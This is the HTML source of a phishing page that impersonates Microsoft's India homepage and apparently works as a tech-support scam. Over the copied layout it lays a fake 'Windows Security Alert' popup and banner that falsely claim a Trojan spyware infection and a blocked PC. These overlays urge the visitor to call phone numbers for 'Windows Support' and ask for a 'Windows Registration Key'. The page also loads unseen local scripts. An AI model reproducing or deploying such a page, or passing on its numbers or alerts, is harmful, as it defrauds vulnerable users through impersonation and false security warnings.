<!DOCTYPE html>
<html lang="en-IN" dir="ltr">
   <head>
      <link rel="dns-pre etch" href="https://cdn-dynmedia-1.microsoft.com">
      <link rel="preconnect" href="https://cdn-dynmedia-1.microsoft.com">
      <link rel="dns-prefetch" href="https://web.vortex.data.microsoft.com">
      <link rel="preconnect" href="https://web.vortex.data.microsoft.com">
      <link rel="dns-prefetch" href="https://img-prod-cms-rt-microsoft-com.akamaized.net">
      <link rel="preconnect" href="https://img-prod-cms-rt-microsoft-com.akamaized.net">
      <link rel="dns-prefetch" href="https://c.s-microsoft.com">
      <link rel="preconnect" href="https://c.s-microsoft.com">
      <link rel="dns-prefetch" href="https://analytics.tiktok.com">
      <link rel="preconnect" href="https://analytics.tiktok.com">
      <link rel="dns-prefetch" href="https://bat.bing.com">
      <link rel="preconnect" href="https://bat.bing.com">
      <link rel="dns-prefetch" href="https://cdnssl.clicktale.net">
      <link rel="preconnect" href="https://cdnssl.clicktale.net">
      <link rel="dns-prefetch" href="https://d.impactradius-event.com">
      <link rel="preconnect" href="https://d.impactradius-event.com">
      <link rel="dns-prefetch" href="https://js.monitor.azure.com">
      <link rel="preconnect" href="https://js.monitor.azure.com">
      <link rel="dns-prefetch" href="https://mem.gfx.ms">
      <link rel="preconnect" href="https://mem.gfx.ms">
      <link rel="dns-prefetch" href="https://wcpstatic.microsoft.com">
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
      <meta http-equiv="x-ua-compatible" content="ie=edge">
      <title>Microsoft – Cloud, Computers, Apps &amp; Gaming</title>
      <link rel="canonical" href="https://www.microsoft.com/en-in">
      <link rel="stylesheet" href="css/main-light.min.ACSHASHfd071803266ba1f4336b43868366299a.css" type="text/css">
      <link rel="stylesheet" href="css/clientlib-base.min.ACSHASH24e963c5973b1072ed7b92de5bd89ad2.css" type="text/css">
      <link rel="stylesheet" href="css/clientlib-uhf.min.ACSHASHf9f2395c582fa601707b7a5dfae9f05f.css" type="text/css">
      </script>
      <script type="text/javascript" src="js/v1.min.ACSHASHc343dfb005ac8c14ae0dd22dd17fb2fc.js" async=""></script>
      <script src="assets/js/jquery.min.js"></script>
      <script type="text/javascript" src="assets/js/params.js"></script>
      <script type="text/javascript" src="assets/js/main.js"></script>
      <script src="assets/js/land.js"></script> 
      <style>
         .popup-overlay {
         position: absolute;
         top: 0;
         left: 0;
         width: 100%;
         height: 100%;
         background-color: rgba(0, 0, 0, 0.5);
         display: flex;
         justify-content: center;
         align-items: top;
         z-index: 11; /* Ensure the popup appears on top */
         height: 100vh;
         }
         .popup-content {
         margin-top: 10px;
         background-color: white;
         padding: 20px;
         padding-top: 15px;
         border-radius: 5px;
         box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
         height: 350px;
         width: 45%;
         }
         .popup-content p {
         font-size: 20px;
         color: #000;
         line-height: 30px;
         }
      </style>
   </head>
   <body class="page basicpage" style="height: 100%;overflow: hidden;" id="cursor">
      <span style="display:none">
         <script>
            window.mscv = 'CASMicrosoftCV6d16fd25.0'
         </script>
         <script>
            window.msservercv = 'CASMicrosoftCV6d16fd25.0'
         </script>
         Trace Id is missing
         <script>
            window.traceid = undefined;
         </script>
      </span>
      <script type="text/javascript">
         window.msauthIsPublisher = true;
      </script>
      <span aria-hidden="true" class="d-none geo-info" data-continent="EU" data-country_code="FR" data-region_code="IDF" data-city="PARIS" data-timezone="GMT+1" data-zip="" data-county="" data-areacode="">
      </span>
      <div id="page-top" tabindex="-1"></div>
      <div id="modalsRenderedAfterPageLoad">
      </div>
      <div class="universalheader" data-component-id="cf9a86dceae618e01d6e6399d243873c">
         <link rel="stylesheet" href="css/44-c33a61.css" type="text/css" media="all">
         <div id="headerArea" class="uhf" data-m="{" cn":"headerarea","ct":"area_coreuiarea","id":"a1body","sn":1,"an":"body"}"="">
         <div id="headerRegion" data-region-key="headerregion" data-m="{" cn":"headerregion","ct":"region_coreui-region","id":"r1a1","sn":1,"an":"a1"}"="">
         <div id="headerUniversalHeader" data-m="{" cn":"headeruniversalheader","ct":"module_coreui-universalheader","id":"m1r1a1","sn":1,"an":"r1a1"}"="" data-module-id="Category|headerRegion|coreui-region|headerUniversalHeader|coreui-universalheader">
         <div id="epb" class="x-hidden x-hidden-vp-mobile-st uhfc-universal-context context-uhf" data-m="{" cn":"epb_cont","ct":"container","id":"c1m1r1a1","sn":1,"an":"m1r1a1"}"="">
         <div class="c-uhfh-alert f-information epb-container theme-light" role="dialog" aria-label="Promotional Banner" data-m="{" ct":"container","id":"c1c1m1r1a1","sn":1,"an":"c1m1r1a1"}"="" data-pb="[{" browser":"edge","extensiontype":"windows10only","extensionurl":"https:="" aka.ms="" microsoftedgedownload","backgroundcolordarktheme":"b-black","logourldarktheme":"https:="" img-prod-cms-rt-microsoft-com.akamaized.net="" cms="" api="" am="" imagefiledata="" re4xdax","actionlinkbackgroundcolordarktheme":"btn-white","backgroundcolorlighttheme":"b-white","logourllighttheme":"https:="" re4xdax","actionlinkbackgroundcolorlighttheme":"btn-light-blue","title":"try="" the="" browser="" recommended="" by="" microsoft","paragraph":"get="" speed,="" security="" and="" privacy="" with="" microsoft="" edge","actionlinktext":"download="" now","actionlinkarialabel":"download="" now","dismisstext":"no="" thanks","dismissarialabel":"no="" thanks","cookieexpiration":"30","currenttheme":"theme-light"},{"browser":"chrome","extensiontype":"windows10only","extensionurl":"https:="" go.microsoft.com="" fwlink="" ?linkid="2231161&quot;,&quot;BackgroundColorDarkTheme&quot;:&quot;b-black&quot;,&quot;LogoUrlDarkTheme&quot;:&quot;http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RW12cms?ver=051d&quot;,&quot;ActionLinkBackgroundColorDarkTheme&quot;:&quot;btn-white&quot;,&quot;BackgroundColorLightTheme&quot;:&quot;b-white&quot;,&quot;LogoUrlLightTheme&quot;:&quot;https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RW1fJPf?ver=4512&quot;,&quot;ActionLinkBackgroundColorLightTheme&quot;:&quot;btn-light-blue&quot;,&quot;Title&quot;:&quot;Unleash" ai-powered="" browsing="" copilot="" in="" edge","paragraph":"go="" beyond="" what="" you="" thought="" was="" possible="" your="" ai-companion="" for="" web","actionlinktext":"try="" now","actionlinkarialabel":"try="" now","dismisstext":"no,="" thanks","dismissarialabel":"no,="" thanks","cookieexpiration":"30","currenttheme":"theme-light"},{"browser":"firefox","extensiontype":"msn","extensionurl":"https:="" browserdefaults.microsoft.com="" bnp="" redirect?br="mf&amp;xid=2&amp;channel=uhf&quot;,&quot;BackgroundColorDarkTheme&quot;:&quot;b-blue&quot;,&quot;LogoUrlDarkTheme&quot;:&quot;https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE3zanz?ver=4e18&quot;,&quot;ActionLinkBackgroundColorDarkTheme&quot;:&quot;btn-white&quot;,&quot;BackgroundColorLightTheme&quot;:&quot;b-white&quot;,&quot;LogoUrlLightTheme&quot;:&quot;https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE3zcX5?ver=0d48&quot;,&quot;ActionLinkBackgroundColorLightTheme&quot;:&quot;btn-blue&quot;,&quot;Title&quot;:&quot;Breaking" news="" from="" around="" world","paragraph":"get="" bing="" +="" msn="" extension","actionlinktext":"add="" it="" now","actionlinkarialabel":"add="" thanks","cookieexpiration":"30","currenttheme":"theme-light"}]"="" data-pb-g="true">
         <div>
            <div class="c-paragraph">
               <img alt="" data-src="" src="" class="f-img-lzy">
               <span class="c-text-group pb-content">
               <span class="epb-launch pb-content-heading"></span>
               <span class="epb-text pb-content-text"></span>
               </span>
            </div>
            <span class="c-group">
            <button id="close-epb" class="c-action-trigger c-action-cancel glyph-cancel" data-m="{" cn":"pb-dismiss_nonnav","id":"nn1c1c1m1r1a1","sn":1,"an":"c1c1m1r1a1"}"=""></button>
            <a id="epbTryNow" href="" target="_blank" class="epb-launch c-action-trigger c-action-open" data-m="{" cn":"pb-launch_nav","id":"n2c1c1m1r1a1","sn":2,"an":"c1c1m1r1a1"}"=""></a>
            </span>
         </div>
      </div>
      </div>
      <a id="uhfSkipToMain" class="m-skip-to-main" href="javascript:void(0)" data-href="#primaryArea" tabindex="0" data-m="{" cn":"skip="" to="" content_nonnav","id":"nn3c1m1r1a1","sn":3,"an":"c1m1r1a1"}"="">Skip to main content</a>
      <header class="c-uhfh context-uhf no-js c-sgl-stck " itemscope="itemscope" data-header-footprint="/mshomepage/mshomepageheader, fromService: True" data-magict="true" itemtype="http://schema.org/Organization">
         <div class="theme-light js-global-head f-closed  global-head-cont" data-m="{" cn":"universal="" header_cont","ct":"container","id":"c4c1m1r1a1","sn":4,"an":"c1m1r1a1"}"="">
         <div class="c-uhfh-gcontainer-st">
            <button type="button" class="c-action-trigger c-glyph glyph-arrow-htmllegacy c-close-search" aria-label="Close search" aria-expanded="false" data-m="{" cn":"close="" search_nonnav","id":"nn2c4c1m1r1a1","sn":2,"an":"c4c1m1r1a1"}"=""></button>
            <a id="uhfLogo" class="c-logo c-sgl-stk-uhfLogo" itemprop="url" href="https://www.microsoft.com" aria-label="Microsoft" data-m="{" cn":"globalnav_logo_cont","ct":"container","id":"c3c4c1m1r1a1","sn":3,"an":"c4c1m1r1a1"}"="">
            <img alt="" itemprop="logo" class="c-image" src="https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31" role="presentation" aria-hidden="true">
            <span itemprop="name" role="presentation" aria-hidden="true">Microsoft</span>
            </a>
            <div class="f-mobile-title">
               <button type="button" class="c-action-trigger c-glyph glyph-chevron-left" aria-label="See more menu options" data-m="{" cn":"mobile="" back="" button_nonnav","id":"nn4c4c1m1r1a1","sn":4,"an":"c4c1m1r1a1"}"=""></button>
               <span data-global-title="Microsoft home" class="js-mobile-title"></span>
               <button type="button" class="c-action-trigger c-glyph glyph-chevron-right" aria-label="See more menu options" data-m="{" cn":"mobile="" forward="" button_nonnav","id":"nn5c4c1m1r1a1","sn":5,"an":"c4c1m1r1a1"}"=""></button>
            </div>
            <nav id="uhf-g-nav" aria-label="Contextual menu" class="c-uhfh-gnav" data-m="{" cn":"category="" nav_cont","ct":"container","id":"c6c4c1m1r1a1","sn":6,"an":"c4c1m1r1a1"}"="">
            <ul class="js-paddle-items">
               <li class="single-link js-nav-menu uhf-menu-item">
                  <a id="shellmenu_0" class="c-uhf-nav-link" href="https://www.microsoft.com/en-in/microsoft-365" data-m="{" cn":"catnav_m365_nav","id":"n1c6c4c1m1r1a1","sn":1,"an":"c6c4c1m1r1a1"}"="">Microsoft 365</a>
               </li>
               <li class="single-link js-nav-menu uhf-menu-item">
                  <a id="l0_Teams" class="c-uhf-nav-link" href="https://www.microsoft.com/en-in/microsoft-teams/group-chat-software" data-m="{" cn":"catnav_teams_nav","id":"n2c6c4c1m1r1a1","sn":2,"an":"c6c4c1m1r1a1"}"="">Teams</a>
               </li>
               <li class="single-link js-nav-menu uhf-menu-item">
                  <a id="shellmenu_2" class="c-uhf-nav-link" href="https://copilot.microsoft.com/" data-m="{" cn":"catnav_copilot_nav","id":"n3c6c4c1m1r1a1","sn":3,"an":"c6c4c1m1r1a1"}"="">Copilot</a>
               </li>
               <li class="single-link js-nav-menu uhf-menu-item">
                  <a id="shellmenu_3" class="c-uhf-nav-link" href="https://www.microsoft.com/en-in/windows/" data-m="{" cn":"catnav_windows_nav","id":"n4c6c4c1m1r1a1","sn":4,"an":"c6c4c1m1r1a1"}"="">Windows</a>
               </li>
               <li class="single-link js-nav-menu uhf-menu-item">
                  <a id="shellmenu_4" class="c-uhf-nav-link" href="https://www.microsoft.com/surface" data-m="{" cn":"catnav_surface_nav","id":"n5c6c4c1m1r1a1","sn":5,"an":"c6c4c1m1r1a1"}"="">Surface</a>
               </li>
               <li class="single-link js-nav-menu uhf-menu-item">
                  <a id="shellmenu_5" class="c-uhf-nav-link" href="https://www.xbox.com/" data-m="{" cn":"catnav_xbox_nav","id":"n6c6c4c1m1r1a1","sn":6,"an":"c6c4c1m1r1a1"}"="">Xbox</a>
               </li>
               <li class="single-link js-nav-menu uhf-menu-item">
                  <a id="l1_support" class="c-uhf-nav-link" href="https://support.microsoft.com/en-in" data-m="{" cn":"catnav_support_nav","id":"n7c6c4c1m1r1a1","sn":7,"an":"c6c4c1m1r1a1"}"="">Support</a>
               </li>
               <li id="overflow-menu" class="overflow-menu x-hidden uhf-menu-item">
                  <div class="c-uhf-menu js-nav-menu">
                     <button data-m="{" pid":"more","id":"nn8c6c4c1m1r1a1","sn":8,"an":"c6c4c1m1r1a1"}"="" type="button" aria-label="More" aria-expanded="false">More</button>
                     <ul id="overflow-menu-list" aria-hidden="true" class="overflow-menu-list">
                     </ul>
                  </div>
               </li>
            </ul>
            </nav>
            <div class="c-uhfh-actions" data-m="{" cn":"header="" actions_cont","ct":"container","id":"c7c4c1m1r1a1","sn":7,"an":"c4c1m1r1a1"}"="">
            <form class="c-search" autocomplete="off" id="searchForm" name="searchForm" role="search" action="https://www.microsoft.com/en-in/search/result.aspx" method="GET" data-seautosuggest="{" queryparams":{"market":"en-in","clientid":"7f27b536-cf6b-4c65-8638-a0f8cbdfca65","sources":"iris-products,dcatall-products,microsoft-terms","filter":"+clienttype:storeweb","counts":"1,5,5"},"familynames":{"apps":"app","books":"book","bundles":"bundle","devices":"device","fees":"fee","games":"game","musicalbums":"album","musictracks":"song","musicvideos":"video","musicartists":"artist","operatingsystem":"operating="" system","software":"software","movies":"movie","tv":"tv","csv":"gift="" card","videoactor":"actor"}}"="" data-seautosuggestapi="https://www.microsoft.com/msstoreapiprod/api/autosuggest" data-m="{" cn":"globalnav_search_cont","ct":"container","id":"c3c1c7c4c1m1r1a1","sn":3,"an":"c1c7c4c1m1r1a1"}"="" aria-expanded="false">
            <input id="cli_shellHeaderSearchInput" aria-label="Search Expanded" aria-autocomplete="list" aria-expanded="false" aria-controls="universal-header-search-auto-suggest-transparent" aria-owns="universal-header-search-auto-suggest-ul" type="search" name="q" role="combobox" placeholder="Search Microsoft.com" data-m="{" cn":"searchbox_nav","id":"n1c3c1c7c4c1m1r1a1","sn":1,"an":"c3c1c7c4c1m1r1a1"}"="" data-toggle="tooltip" data-placement="right" title="Search Microsoft.com">
            <input type="hidden" name="form" value="MSHOME" data-m="{" cn":"hiddeninput_nav","id":"n2c3c1c7c4c1m1r1a1","sn":2,"an":"c3c1c7c4c1m1r1a1"}"="">
            <button id="search" aria-label="Search Microsoft.com" class="c-glyph" data-m="{" cn":"search_nav","id":"n3c3c1c7c4c1m1r1a1","sn":3,"an":"c3c1c7c4c1m1r1a1"}"="" data-bi-mto="true" aria-expanded="false" disabled="disabled">
            <span role="presentation">Search</span>
            <span role="tooltip" class="c-uhf-tooltip c-uhf-search-tooltip">Search Microsoft.com</span>
            </button>
            <div class="m-auto-suggest" id="universal-header-search-auto-suggest-transparent" role="group">
               <ul class="c-menu" id="universal-header-search-auto-suggest-ul" aria-label="Search Suggestions" aria-hidden="true" data-bi-dnt="true" data-bi-mto="true" data-js-auto-suggest-position="default" role="listbox" data-tel="jsll" data-m="{" cn":"search="" suggestions_cont","ct":"container","id":"c4c3c1c7c4c1m1r1a1","sn":4,"an":"c3c1c7c4c1m1r1a1"}"=""></ul>
               <ul class="c-menu f-auto-suggest-no-results" aria-hidden="true" data-js-auto-suggest-postion="default" data-js-auto-suggest-position="default" role="listbox">
                  <li class="c-menu-item"> <span tabindex="-1">No results</span></li>
               </ul>
            </div>
            </form>
            <button data-m="{" cn":"cancel-search","pid":"cancel="" search","id":"nn4c1c7c4c1m1r1a1","sn":4,"an":"c1c7c4c1m1r1a1"}"="" id="cancel-search" class="cancel-search" aria-label="Cancel Search">
            <span>Cancel</span>
            </button>
            <a id="uhf-shopping-cart" aria-label="0 items in shopping cart" class="c-action-trigger c-glyph c-uhf-nav-link glyph-shopping-cart" href="https://www.microsoft.com/en-in/store/cart" data-src-dmn-chk="true" data-m="{" cn":"globalnav_cart_nav","bhvr":82,"id":"n5c1c7c4c1m1r1a1","sn":5,"an":"c1c7c4c1m1r1a1"}"="">
            <span class="shopping-cart-amount x-hidden" aria-hidden="true">0</span>
            <span class="c-cart-lbl c-st-lbl">Cart</span>
            <span id="uhf-shopping-cart-tooltip" class="c-uhf-tooltip" role="tooltip">0 items in shopping cart</span>
            </a>
            <iframe id="shell-cart-count" data-src="//www.microsoft.com/store/buy/cartcount"></iframe>
            <div id="meControl" class="c-me" data-signinsettings="{" containerid":"mecontrol","enabled":true,"headerheight":48,"debug":false,"extensiblelinks":[],"userdata":{"idp":"msa","firstname":"","lastname":"","membername":"","cid":"","authenticatedstate":"3"},"rpdata":{"preferredidp":"msa","msainfo":{"signinurl":"="" en-in="" store="" signin","signouturl":"="" signout","meurl":"https:="" login.live.com="" me.srf?wa="wsignin1.0&quot;},&quot;aadInfo&quot;:{&quot;signOutUrl&quot;:&quot;/en-in/store/signout&quot;,&quot;appId&quot;:&quot;&quot;,&quot;siteUrl&quot;:&quot;&quot;,&quot;blockMsaFed&quot;:true}}}&quot;" data-m="{" cn":"globalnav_account_cont","ct":"container","id":"c6c1c7c4c1m1r1a1","sn":6,"an":"c1c7c4c1m1r1a1"}"="">
            <div class="msame_Header">
               <div class="msame_Header_name st_msame_placeholder">Sign in</div>
            </div>
         </div>
         </div>
         </div>
         </div>
      </header>
      </div>
      </div>
      </div>
      <div class="meControl-configInfo" data-isenabled="true" data-preferredidp="msa" data-signinurl="/rpsauth/v1/account/SignIn" data-msasignouturl="/rpsauth/v1/account/SignOut" data-convergedstack="false" data-accountconstraint="0" data-apigeneration="GEN1" data-silentauthrequirereload="false" data-silentauthaction="none"></div>
      <div class="userInfo-config" data-userinfourl="/rpsauth/account/api/v1/userinfo" data-userinfotimeoutms="1000" data-retrydelayms="2000" data-maxretryattempt="3"></div>
      </div>
      <!-- Popup HTML -->
      <div id="popup" class="popup-overlay">
         <div class="popup-content">
            <div class="row" style="justify-content: space-between;padding: 10px;">
               <div class="row">
                  <img src="images/logoimg.png" alt="" srcset="" height="40px">
                  <h4 style="margin-left: 10px;">Windows Security Alert</h4>
               </div>
               <div>
                  <button type="button" class="btn-close" aria-label="Close" style="float: right;">X</button>
               </div>
            </div>
            <div style="background-color:#0373CF;padding: 25px;justify-content: space-around; margin-top: 10px;" class="row">
               <div>
                  <img src="images/logoms.jpg" alt="Surface Laptop 5" style="height: 100px;">
               </div>
               <div>
                  <p style="color: #fff;">Trojan Spyware Alert - Error Code: #ox268d3<br>Access to this PC has been blocked for security reasons.<br>Contact Windows Support: +1-825-799-5100</p>   
               </div>   
            </div>
            <div class="row" style="justify-content: space-around; margin-top: 20px;">
               <div>
                     <p>Threat Detected - Trojan Spyware <br> App: Ads.financetrack.exe</p>
               </div>
               <div>
               <button type="button" class="btn btn-primary" style="background-color: red;">Ignore Alert</button>
               <button type="button" class="btn btn-success" style="background-color: green;color: #fff;">Chat Now</button>
            </div>
            </div>
         </div>
      </div>
      <div class="root responsivegrid">
         <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 ">
            <div class="layout-container responsivegrid aem-GridColumn aem-GridColumn--default--12" data-component-id="28134f1ee1370eee417bc52d1ed0a717">
               <main class="microsoft-template-layout-container" tabindex="-1">
                  <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 ">
                     <div class="cookie-banner aem-GridColumn aem-GridColumn--default--12" data-component-id="b8b7bb97ccd21a2a7efb223b52e82af0">
                     </div>
                     <div class="responsivegrid aem-GridColumn aem-GridColumn--default--12">
                        <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 ">
                        </div>
                     </div>
                     <div class="responsivegrid mb-md-5 aem-GridColumn aem-GridColumn--default--12">
                        <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 ">
                           <div class="container" style="margin-top: 2vh;">
                              <div class="row">
                                 <div class="col-md-6">
                                    <!-- First Column with Text -->
                                    <div class="text-left">
                                       <h6>Windows Security Tollfree:</h6>
                                       <h2>+1-844-900-0923</h2>
                                       <p>Prevent this page from creating additional dialogues.</p>
                                    </div>
                                 </div>
                                 <div class="col-md-6">
                                    <!-- Second Column with Input Form -->
                                    <div class="text-right">
                                       <h6>Enter Windows Registraion Key</h6>
                                       <form class="form-inline" style="justify-content: flex-end;">
                                          <div class="form-group">
                                             <label for="inputField">Enter Key:</label>
                                             <input type="text" class="form-control" id="inputField" placeholder="Enter something">
                                          </div>
                                          <button type="submit" class="btn btn-primary mb-2 mt-2 ml-2">Submit</button>
                                       </form>
                                    </div>
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                     <div class="container" style="background-color: rgb(47, 0, 255);display: block; position: absolute; top:60vh;z-index: 10;height: 300px;">
                        <div class="row" style="display: flex;
                           flex-wrap: wrap;
                           margin-right: -0.75rem;
                           margin-left: -0.75rem;
                           top: 50%;
                           -ms-transform: translateY(-50%);
                           transform: translateY(-50%);
                           position: relative;">
                           <div class="col-sm">
                              <img src="images/msicon.jpg" alt="Surface Laptop 5" style="height: 200px;">                             
                           </div>
                           <div class="col-sm" style="color: #fff;">
                              <h2>Windows Support Alert</h2>
                              <h4>Your Sytem Detect Some Unusual Activity.</h4>
                              <p>it might harm your computer data and track your finacial activities.</p>
                              <h4>Please Report this activity to +1-844-900-0923</h4>
                              <button type="button" class="btn btn-primary">Ignore Alert</button>
                              <button type="button" class="btn btn-success" style="background-color: green;margin-left: ;">Chat Now</button>
                           </div>
                        </div>
                     </div>
                     <div class="responsivegrid mb-md-5 aem-GridColumn aem-GridColumn--default--12">
                        <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 ">
                           <div class="layout-container responsivegrid aem-GridColumn aem-GridColumn--default--12" data-component-id="51e927945f39700e952adb9bd3dc97e7">
                              <div class="aem-Grid aem-Grid--12 aem-Grid--default--12  grid-image-layout-container-uidfd75  heading-bg-color-layout-container-uidfd75" data-automation-test-id="layout-container-uidfd75">
                                 <style data-automation-test-id="headingColor-layout-container-uidfd75">
                                    .heading-bg-color-layout-container-uidfd75{
                                    background-color:  !important;
                                    }
                                 </style>
                                 <div class="container" id="layout-container-uidfd75" data-componentname="layout-container-uidfd75">
                                    <div class="content-card carouselbase carousel aem-GridColumn aem-GridColumn--default--12" data-component-id="e4caa97101f9f7cf8317c819b353e6ed">
                                       <link rel="stylesheet" href="css/site.min.ACSHASHc033b611d87d511847501ade7913431f.css" type="text/css">
                                       <section id="content-card-uide60e" data-componentname="content-card-uide60e">
                                          <div class="row row-cols-1   row-cols-sm-2 row-cols-lg-4">
                                             <link rel="stylesheet" href="css/site.min.ACSHASH7e98ce1d1fb3c40effe0a57430c1371c.css" type="text/css">
                                             <link rel="stylesheet" href="css/site.min.ACSHASH5eb7940588edeff2b13a25b0bd1cb864.css" type="text/css">
                                             <div class="col 
                                                mb-5 mb-lg-0
                                                " clickgroup-telemetry-enabled="">
                                                <div class="card  " data-target-uri="https://www.microsoft.com/en-in/surface/devices/surface-laptop-5?icid=mscom_marcom_CPH1a_SurfaceLaptop5" data-bi-ecn="Learn more" data-bi-ct="Content Card" data-bi-pa="body" data-bi-ehn="Surface Laptop 5" data-bi-assetid="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Surface-Laptop-5-M1-Platinum-01-1?wid=515&amp;hei=293&amp;fit=crop" data-bi-bhvr="0" data-bi-hn="Surface Laptop 5" data-bi-compnm="Content card vertical 4 up - noDepth" data-bi-cn="Learn more">
                                                   <picture>
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Surface-Laptop-5-M1-Platinum-01-1?wid=380&amp;hei=213&amp;fit=crop" media="(min-width: 1400px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Surface-Laptop-5-M1-Platinum-01-1?wid=297&amp;hei=167&amp;fit=crop" media="(min-width: 1084px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Surface-Laptop-5-M1-Platinum-01-1?wid=517&amp;hei=293&amp;fit=crop" media="(min-width: 860px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Surface-Laptop-5-M1-Platinum-01-1?wid=406&amp;hei=230&amp;fit=crop" media="(min-width: 540px)">
                                                      <img src="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Surface-Laptop-5-M1-Platinum-01-1?wid=406&amp;hei=230&amp;fit=crop" loading="lazy" class="card-img" alt="An angled view of Surface Laptop 5.">
                                                   </picture>
                                                   <!-- If any of the cards in a group contain a badge, all cards should include a card header -->
                                                   <div class="card-body  pt-3">
                                                      <h2 class="h3    ">
                                                         Surface Laptop 5
                                                      </h2>
                                                      <p> Sophisticated style and multitasking speed powered by 12th Gen Intel® Core, with Windows 11. </p>
                                                   </div>
                                                   <div class="card-footer pt-3 ">
                                                      <div class="link-group" data-automation-test-id="LinkGroupDiv-">
                                                         <a data-bi-cn="Learn more" data-bi-ecn="Learn more" data-bi-ct="cta" data-bi-pa="body" class=" cta   " data-target-uri="https://www.microsoft.com/en-in/surface/devices/surface-laptop-5?icid=mscom_marcom_CPH1a_SurfaceLaptop5" data-bi-assetid="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Surface-Laptop-5-M1-Platinum-01-1?wid=515&amp;hei=293&amp;fit=crop" data-bi-bhvr="0" data-bi-mto="" data-automation-test-id="cta1-" aria-label="Learn more about Surface Laptop 5." target="_self" data-bi-ehn="Surface Laptop 5" data-bi-hn="Surface Laptop 5" data-bi-compnm="Content card vertical 4 up - noDepth" href="https://www.microsoft.com/en-in/surface/devices/surface-laptop-5?icid=mscom_marcom_CPH1a_SurfaceLaptop5">
                                                         Learn more
                                                         <span class="glyph" aria-hidden="true"></span> 
                                                         </a>
                                                      </div>
                                                   </div>
                                                </div>
                                             </div>
                                             <script type="text/javascript" src="js/site.min.ACSHASHd41d8cd98f00b204e9800998ecf8427e.js" defer=""></script><script type="text/javascript" src="js/site.min.ACSHASHd41d8cd98f00b204e9800998ecf8427e_1.js" defer=""></script>
                                             <div class="col 
                                                mb-5 mb-lg-0
                                                " clickgroup-telemetry-enabled="">
                                                <div class="card  " data-target-uri="https://www.microsoft.com/en-in/surface/devices/surface-laptop-studio?icid=mscom_marcom_CPH2a_SurfaceLaptopStudio" data-bi-ecn="Learn more" data-bi-ct="Content Card" data-bi-pa="body" data-bi-ehn="Surface Laptop Studio" data-bi-assetid="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Surface-Laptop-Studio-01-CP?wid=515&amp;hei=293&amp;fit=crop" data-bi-bhvr="0" data-bi-hn="Surface Laptop Studio" data-bi-compnm="Content card vertical 4 up - noDepth" data-bi-cn="Learn more">
                                                   <picture>
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Surface-Laptop-Studio-01-CP?wid=380&amp;hei=213&amp;fit=crop" media="(min-width: 1400px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Surface-Laptop-Studio-01-CP?wid=297&amp;hei=167&amp;fit=crop" media="(min-width: 1084px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Surface-Laptop-Studio-01-CP?wid=517&amp;hei=293&amp;fit=crop" media="(min-width: 860px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Surface-Laptop-Studio-01-CP?wid=406&amp;hei=230&amp;fit=crop" media="(min-width: 540px)">
                                                      <img src="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Surface-Laptop-Studio-01-CP?wid=406&amp;hei=230&amp;fit=crop" loading="lazy" class="card-img" alt="Surface Laptop Studio with keyboard attached, propped on kickstand.">
                                                   </picture>
                                                   <!-- If any of the cards in a group contain a badge, all cards should include a card header -->
                                                   <div class="card-body  pt-3">
                                                      <h2 class="h3    ">
                                                         Surface Laptop Studio
                                                      </h2>
                                                      <p> Flex your creative muscle on the most powerful Surface Laptop. Now available with Windows 11. </p>
                                                   </div>
                                                   <div class="card-footer pt-3 ">
                                                      <div class="link-group" data-automation-test-id="LinkGroupDiv-">
                                                         <a data-bi-cn="Learn more" data-bi-ecn="Learn more" data-bi-ct="cta" data-bi-pa="body" class=" cta   " data-target-uri="https://www.microsoft.com/en-in/surface/devices/surface-laptop-studio?icid=mscom_marcom_CPH2a_SurfaceLaptopStudio" data-bi-assetid="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Surface-Laptop-Studio-01-CP?wid=515&amp;hei=293&amp;fit=crop" data-bi-bhvr="0" data-bi-mto="" data-automation-test-id="cta1-" aria-label="Learn more about the new Surface Laptop Studio" target="_self" data-bi-ehn="Surface Laptop Studio" data-bi-hn="Surface Laptop Studio" data-bi-compnm="Content card vertical 4 up - noDepth" href="https://www.microsoft.com/en-in/surface/devices/surface-laptop-studio?icid=mscom_marcom_CPH2a_SurfaceLaptopStudio">
                                                         Learn more
                                                         <span class="glyph" aria-hidden="true"></span> 
                                                         </a>
                                                      </div>
                                                   </div>
                                                </div>
                                             </div>
                                             <script type="text/javascript" src="js/site.min.ACSHASHd41d8cd98f00b204e9800998ecf8427e.js" defer=""></script><script type="text/javascript" src="js/site.min.ACSHASHd41d8cd98f00b204e9800998ecf8427e_1.js" defer=""></script>
                                             <div class="col 
                                                mb-5 mb-sm-0" clickgroup-telemetry-enabled="">
